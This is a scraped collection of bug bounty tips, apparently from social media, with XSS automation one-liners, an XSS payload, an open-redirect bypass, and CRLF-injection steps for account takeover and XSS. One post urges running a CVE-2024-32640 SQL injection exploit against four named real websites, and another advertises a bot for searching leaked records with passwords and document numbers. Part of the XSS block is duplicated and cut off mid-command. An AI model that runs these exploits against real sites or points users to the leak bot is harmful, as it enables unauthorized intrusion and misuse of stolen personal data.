Bug bounty Tips

#Threat_Research 1. TG8 Firewall - PreAuth RCE/Password Disclosure (PoC) https://ssd-disclosure.com/ssd-advisory-tg8-firewall-preauth-rce-and-password-disclosure 2. Cisco RV34X Series - Privilege Escalation in vpnTimer. Root Cause Analysis (PoC for CVE-2021-1520) https://www.iot-inspector.com/blog/advisory-cisco-rv34x-series-privilege-escalation-vpntimer

Automate XSS using Dalfox, WaybackURL, GF Patterns. Make sure you have Go installed on your Machine To Install Go on your Machine: 1) sudo apt install -y golang 2) export GOROOT=/usr/lib/go 3) export GOPATH=$HOME/go 4) export PATH=$GOPATH/bin:$GOROOT/bin:$PATH 5) source .bashrc How to Hunt Blind XSS using Dalfox? Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target. Use GF patterns to find Possible XSS Vulnerable Parameters. Use Dalfox to find XSS. Steps : waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt How to Hunt Reflected XSS? Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target. Use qsreplace for Accept URLs on stdin, replace all query string values with a user-supplied value, only output each combination of query string parameters once per host and path. Steps : waybackurls testphp.vulnweb.com| grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done Find the parameters which are not filtering special characters - One Liner echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt cat waybackruls | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$h Find the parameters which are not filtering special characters - One Liner echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt cat waybackruls | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt

Automate XSS using Dalfox, WaybackURL, GF Patterns. Make sure you have Go installed on your Machine To Install Go on your Machine: 1) sudo apt install -y golang 2) export GOROOT=/usr/lib/go 3) export GOPATH=$HOME/go 4) export PATH=$GOPATH/bin:$GOROOT/bin:$PATH 5) source .bashrc How to Hunt Blind XSS using Dalfox? Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target. Use GF patterns to find Possible XSS Vulnerable Parameters. Use Dalfox to find XSS. Steps : waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt How to Hunt Reflected XSS? Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target. Use qsreplace for Accept URLs on stdin, replace all query string values with a user-supplied value, only output each combination of query string parameters once per host and path. Steps : waybackurls testphp.vulnweb.com| grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done Find the parameters which are not filtering special characters - One Liner echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt cat waybackruls | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$h Find the parameters which are not filtering special characters - One Liner echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt cat waybackruls | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt

#bugbountytips: always see if there a captcha in your Target.then try to know how the captcha it's work and try to bypass it you don't know maybe you got it😉 #Note: Many programs don't accept this kind of vulnerability. So you must search just in authentication endpoint

🚨GraphQL Test Cases Checklist🚨 🔗Link- https://anmolksachan.github.io/graphql/

when you are looking for bugs like SSRF & Open Redirect. and there is a blacklisted character. try to bypassed using other Unicode characters. I found Open Redirect Bypass Using (。) Chinese dot "%E3%80%82". poc: redirect_to=////evil%E3%80%82com #BugBounty #bugbountytip

CRLF Tip: Starting payloads: /end/vuln/%0a%0d /end/vuln/%0a ...etc. Now escalate the impact: 1- ATO If the web app vulnerable to Session Fixition, simply set a new cookie using the CRLF and send it to the Victim, then try to login with the injected cookies 2- Open redirect Just add "Location:" header 3- XSS - Add the "Location:" header with the value: "javascript: confirm(1)" - Add the "Content-Length:" header this will make the response body read it at the end of response headers, then add your XSS payload

test on these site and thank me later just give star to him :) python3 CVE-2024-32640.py -u http://masa01.imve.com/ -g --dbs python3 CVE-2024-32640.py -u https://www.kunstuitleenutrecht.nl -g --dbs python3 CVE-2024-32640.py -u https://www.ryanwatts.me/ -g --dbs python3 CVE-2024-32640.py -u http://www.pennydesigns.com/ -g --dbs

Automated SQLi Exploitation of Mura & Masa CMS via CVE-2024-32640 thank to my friend @StuartBeck11 for amazing work ! give him a star ⭐ https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS

💧 At the moment, our bot is loaded with 2078 leaks. ✏️ In total they contain 52.536.415.358 records. 😲 This is more than any other telegram bot! 🔎 The following data is available for search: 📩Email: 23.841.454.924 👤Full name: 9.297.275.706 📞Telephone: 6.820.638.162 👤Nick: 4.576.677.061 🔑Password: 2.777.429.639 🃏Document Number: 1.487.310.933 🆔VK ID: 1.193.605.990 ⓕFacebookID: 824.900.847 🎯IP: 453.335.698 🔗Link: 301.684.979 🏢Company name: 297.019.478 🚘Vehicle number: 284.274.869 🌐Domain: 180.748.922 ✈TelegramID: 154.968.917 📷Instagram ID: 45.089.233

Thread by @tabaahi_ on Thread Reader App – Thread Reader App https://threadreaderapp.com/thread/1571386282835873792.html